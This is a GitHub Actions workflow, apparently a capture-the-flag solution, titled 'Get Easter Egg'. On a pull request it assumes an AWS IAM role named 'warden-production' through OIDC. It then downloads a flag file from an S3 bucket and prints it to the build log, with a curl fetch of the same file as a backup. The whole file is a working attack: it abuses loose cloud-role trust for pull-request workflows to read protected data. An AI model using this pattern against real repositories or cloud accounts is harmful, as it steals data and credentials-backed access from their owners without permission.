name: Get Easter Egg
on:
  pull_request:
    branches: [ main ]

jobs:
  get-flag:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    
    steps:
    - name: Configure AWS
      uses: aws-actions/configure-aws-credentials@v4
      with:
        aws-region: us-east-1
        role-to-assume: arn:aws:iam::ACCOUNT-ID:role/warden-production
        
    - name: Get Easter Egg Flag
      run: |
        # Direct download of the target file
        aws s3 cp s3://warden-easter-egg-c4bak76z/easter_egg.txt ./flag.txt
        
        # Show the flag
        echo "🥚 EASTER EGG FOUND:"
        echo "=================="
        cat ./flag.txt
        echo "=================="
        
        # Also try HTTP as backup
        echo "🌐 HTTP Backup:"
        curl -s http://warden-easter-egg-c4bak76z.s3.amazonaws.com/easter_egg.txt
